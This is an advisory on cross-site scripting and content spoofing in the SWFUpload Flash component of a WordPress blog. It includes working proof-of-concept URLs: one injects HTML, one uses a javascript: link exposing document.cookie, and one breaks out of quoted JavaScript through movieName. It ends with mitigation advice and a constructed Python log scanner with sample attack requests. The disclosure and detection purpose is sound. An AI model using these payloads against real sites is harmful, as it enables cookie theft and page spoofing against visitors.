Cross Site Scripting in RedTube Official Blog

#Title: Cross Site Scripting in RedTube Official Blog

Vector of operation: Remote
Impact: Cross Site Scripting & Content Spoofing


The vulnerability is caused by insufficient input validation of the “movieName” and “buttonText” parameters accepted by swfupload.swf, the SWFUpload Flash component shipped under wp-includes/js/swfupload/. buttonText is rendered as HTML inside the Flash movie, and movieName is embedded into the JavaScript that the movie passes to the browser through ExternalInterface. This can be exploited to inject arbitrary HTML and execute script code in a user’s browser session in the context of the affected site.

There are two vulnerabilities in RedTube Official Blog.

*Content Spoofing

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src=''>

The Flash text field renders the value as HTML, so it is possible to inject text, images and markup (e.g. for link injection).

*Cross-Site Scripting

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>

The code only runs once the victim clicks the injected link, so this is strictly a social-engineering XSS.

*Proof of Concept Code

Content spoofing through buttonText (places an image or other markup in the Flash button):

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src=''>

Script execution through buttonText (fires when the victim clicks the injected link):

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>

Script execution through movieName (the value is placed inside the quoted JavaScript that the movie hands to the browser via ExternalInterface; the payload closes that string and call, appends its own statement and comments out the rest):

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//

On the server side, upgrade to a version of WordPress (or of SWFUpload) that ships a non-vulnerable swfupload.swf. On the client side, the usual advice is to use a browser that obeys the Content-Type header sent by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera, and to rely on the XSS Filter of Internet Explorer 8 to block the malicious script. Treat that as a partial measure only: swfupload.swf is served as a genuine Flash movie and the script is launched by Flash Player through ExternalInterface rather than by the browser rendering the response, so Content-Type handling and reflected-XSS filters are not a reliable defence; disabling Flash or running it click-to-play is the dependable client-side control.
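As a defender-side check, added here and not part of the original advisory: the following Python scans web-server access-log lines for requests to swfupload.swf whose buttonText or movieName values contain characters outside a conservative allow-list, which covers both the HTML injection and the ExternalInterface breakout shown above. The log lines, client addresses and the allow-list are constructed for this example; adjust the path test if swfupload.swf lives somewhere other than wp-includes/js/swfupload/.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters that the vulnerable swfupload.swf accepts unsanitised.
SUSPECT_PARAMS = ("buttonText", "movieName")

# Conservative allow-list for a button label or an instance name (an
# assumption for this example): letters, digits, space, underscore, dot and
# hyphen. Anything else (<, >, ", ', ], ), ;, / ...) can open a tag in the
# Flash text field or break out of the quoted string handed to the browser.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9 _.\-]*$")

# Common/combined log format; only the client IP, time and request URL are used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def suspicious_params(url):
    """Return {param: decoded_value} for the buttonText/movieName values of a
    swfupload.swf request that fail the allow-list; {} for anything else."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/swfupload.swf"):
        return {}
    # parse_qs percent-decodes the values once; a second decode would be
    # needed if you also want to catch double-encoded payloads.
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in SUSPECT_PARAMS:
        for value in query.get(name, []):
            if not SAFE_VALUE.match(value):
                hits[name] = value
    return hits


def scan_access_log(lines):
    """Return one finding per log line that carries a suspicious swfupload.swf
    request, in input order."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than fail
        hits = suspicious_params(m.group("url"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "url": m.group("url"),
                "params": hits,
            })
    return findings


# Constructed sample: two attack attempts followed by two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /Wordpress/wp-includes/js/swfupload/swfupload.swf'
    '?buttonText=test%3Cimg%20src%3D%27%27%3E HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2012:13:55:40 +0000] "GET /Wordpress/wp-includes/js/swfupload/swfupload.swf'
    '?movieName=%22%5D%29%3B%7Dcatch%28e%29%7B%7Dif%28%21self.a%29self.a%3D%21alert%28%22xss%22%29%3B%2F%2F'
    ' HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2012:13:56:01 +0000] "GET /Wordpress/wp-includes/js/swfupload/swfupload.swf'
    '?movieName=SWFUpload_0&buttonText=Upload HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2012:13:56:02 +0000] "GET /Wordpress/wp-includes/js/swfupload/swfupload.js'
    ' HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ip"], finding["time"], finding["params"])
```

The allow-list approach is deliberate: matching on `<script` or `alert(` would miss the movieName payload, which contains neither, while a label or instance name legitimately never needs quotes, brackets or angle brackets.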
